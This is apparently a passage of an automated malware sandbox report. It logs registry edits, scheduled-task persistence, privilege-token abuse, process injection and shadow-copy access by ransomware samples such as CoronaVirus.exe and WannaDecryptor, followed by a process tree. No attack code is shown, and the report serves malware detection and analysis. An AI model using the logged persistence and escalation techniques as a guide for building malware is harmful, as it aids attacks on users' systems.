\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{5DDF4DD3-1305-11F0-B5E0-5A3D6C403EEC} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bc968b0de5705a4883394fbfad545bdb00000000020000000000106600000001000020000000d7c810331d9521598bfde240c2a0b0f6e89784616a4d4ce819c44a5f21615022000000000e80000000020000200000001877971c48a758287c60ef41a83619528ea0a9c41a7b8b084e470c1c845806de20000000c4f7ae6b98844e1c429ad0f31eb1b3d7de4211fafe43a00e39e822064cb28e0640000000f638d3e250d2b91cc2117bc8444b09e4776de0f3f5e23f09ac52e85046b2f3099e2dc919202b5c988bb5b6ccf64d7a30924cd717f113b1aac5404b54fa3410ca iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bc968b0de5705a4883394fbfad545bdb00000000020000000000106600000001000020000000af346196195fd91141d641c59d9d319b95d0647c2f51026871456675b704c550000000000e8000000002000020000000aec636aa29cb8730caa24c1b6be2167eeca9b5d8aa369664f5b100baf4729b0a20000000247b405933a105e6ce1a2f97a24e083650fa071287b912923876fa75817b5f8c4000000091e3621e57f866460b2d55978b795407642770a9228251a1bf4afad7974df0e597f4915f29a52d569e9381009d6b836495e50d14fa16aec35701f93f6df13784 iexplore.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884311379572032" msedge.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-869607583-2483572573-2297019986-1000\{6AAB2CBC-E36B-4BB6-9D34-604EAD2E1F3E} msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2980 SCHTASKS.exe 2840 SCHTASKS.exe 2204 SCHTASKS.exe 5544 schtasks.exe 5488 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5272 msedge.exe 5272 msedge.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe 3764 CoronaVirus.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs
pid Process 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe -
Suspicious behavior: RenamesItself 2 IoCs
pid Process 3764 CoronaVirus.exe 3764 CoronaVirus.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 3832 vssvc.exe Token: SeRestorePrivilege 3832 vssvc.exe Token: SeAuditPrivilege 3832 vssvc.exe Token: SeShutdownPrivilege 3556 rundll32.exe Token: SeDebugPrivilege 3556 rundll32.exe Token: SeTcbPrivilege 3556 rundll32.exe Token: SeDebugPrivilege 6100 33F.tmp Token: SeShutdownPrivilege 5036 rundll32.exe Token: SeDebugPrivilege 5036 rundll32.exe Token: SeTcbPrivilege 5036 rundll32.exe Token: SeShutdownPrivilege 4940 rundll32.exe Token: SeDebugPrivilege 4940 rundll32.exe Token: SeTcbPrivilege 4940 rundll32.exe Token: SeDebugPrivilege 452 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 4388 taskkill.exe Token: SeIncreaseQuotaPrivilege 5592 WMIC.exe Token: SeSecurityPrivilege 5592 WMIC.exe Token: SeTakeOwnershipPrivilege 5592 WMIC.exe Token: SeLoadDriverPrivilege 5592 WMIC.exe Token: SeSystemProfilePrivilege 5592 WMIC.exe Token: SeSystemtimePrivilege 5592 WMIC.exe Token: SeProfSingleProcessPrivilege 5592 WMIC.exe Token: SeIncBasePriorityPrivilege 5592 WMIC.exe Token: SeCreatePagefilePrivilege 5592 WMIC.exe Token: SeBackupPrivilege 5592 WMIC.exe Token: SeRestorePrivilege 5592 WMIC.exe Token: SeShutdownPrivilege 5592 WMIC.exe Token: SeDebugPrivilege 5592 WMIC.exe Token: SeSystemEnvironmentPrivilege 5592 WMIC.exe Token: SeRemoteShutdownPrivilege 5592 WMIC.exe Token: SeUndockPrivilege 5592 WMIC.exe Token: SeManageVolumePrivilege 5592 WMIC.exe Token: 33 5592 WMIC.exe Token: 34 5592 WMIC.exe Token: 35 5592 WMIC.exe Token: 36 5592 WMIC.exe Token: SeIncreaseQuotaPrivilege 5592 WMIC.exe Token: SeSecurityPrivilege 5592 WMIC.exe Token: SeTakeOwnershipPrivilege 5592 WMIC.exe Token: SeLoadDriverPrivilege 5592 WMIC.exe Token: SeSystemProfilePrivilege 5592 WMIC.exe Token: SeSystemtimePrivilege 5592 WMIC.exe Token: SeProfSingleProcessPrivilege 5592 WMIC.exe Token: SeIncBasePriorityPrivilege 5592 WMIC.exe Token: SeCreatePagefilePrivilege 5592 WMIC.exe Token: SeBackupPrivilege 5592 WMIC.exe Token: SeRestorePrivilege 5592 WMIC.exe Token: SeShutdownPrivilege 5592 WMIC.exe Token: SeDebugPrivilege 5592 WMIC.exe Token: SeSystemEnvironmentPrivilege 5592 WMIC.exe Token: SeRemoteShutdownPrivilege 5592 WMIC.exe Token: SeUndockPrivilege 5592 WMIC.exe Token: SeManageVolumePrivilege 5592 WMIC.exe Token: 33 5592 WMIC.exe Token: 34 5592 WMIC.exe Token: 35 5592 WMIC.exe Token: 36 5592 WMIC.exe Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 3524 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2564 iexplore.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe 5424 msedge.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 1808 OpenWith.exe 1808 OpenWith.exe 1808 OpenWith.exe 1808 OpenWith.exe 1808 OpenWith.exe 1808 OpenWith.exe 1808 OpenWith.exe 2564 iexplore.exe 2564 iexplore.exe 4196 IEXPLORE.EXE 4196 IEXPLORE.EXE 6036 !WannaDecryptor!.exe 6036 !WannaDecryptor!.exe 2272 !WannaDecryptor!.exe 2272 !WannaDecryptor!.exe 2356 !WannaDecryptor!.exe 2356 !WannaDecryptor!.exe 5568 !WannaDecryptor!.exe 5568 !WannaDecryptor!.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 5880 1808 OpenWith.exe 110 PID 1808 wrote to memory of 5880 1808 OpenWith.exe 110 PID 2564 wrote to memory of 4196 2564 iexplore.exe 113 PID 2564 wrote to memory of 4196 2564 iexplore.exe 113 PID 2564 wrote to memory of 4196 2564 iexplore.exe 113 PID 5116 wrote to memory of 388 5116 msedge.exe 118 PID 5116 wrote to memory of 388 5116 msedge.exe 118 PID 388 wrote to memory of 6016 388 msedge.exe 119 PID 388 wrote to memory of 6016 388 msedge.exe 119 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 4488 388 msedge.exe 120 PID 388 wrote to memory of 4488 388 msedge.exe 120 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 2276 388 msedge.exe 121 PID 388 wrote to memory of 5660 388 msedge.exe 123 PID 388 wrote to memory of 5660 388 msedge.exe 123 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2684
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2692
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2808
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe"2⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:1944
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ShowGrant.docx" /o ""2⤵
- Loads dropped DLL
PID:2276
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\ExpandConvert.xht2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:17410 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4196
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops startup file
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:5900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffd3a70f208,0x7ffd3a70f214,0x7ffd3a70f2204⤵PID:6016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2112,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:34⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1992,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=1956 /prefetch:24⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2584,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:84⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:14⤵PID:1596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:14⤵PID:828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4336,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:14⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4380,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:24⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5112,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:84⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:84⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5608,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:84⤵PID:3916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,16340388642580359516,5668657350386562086,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:84⤵PID:5316
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"2⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5424 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2e8,0x7ffd3a70f208,0x7ffd3a70f214,0x7ffd3a70f2203⤵PID:3176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1944,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=1936 /prefetch:23⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2180,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:33⤵
- Downloads MZ/PE file
PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2516,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=2528 /prefetch:83⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3448,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:13⤵PID:3748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:13⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4724,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=4748 /prefetch:83⤵PID:3272
-
-
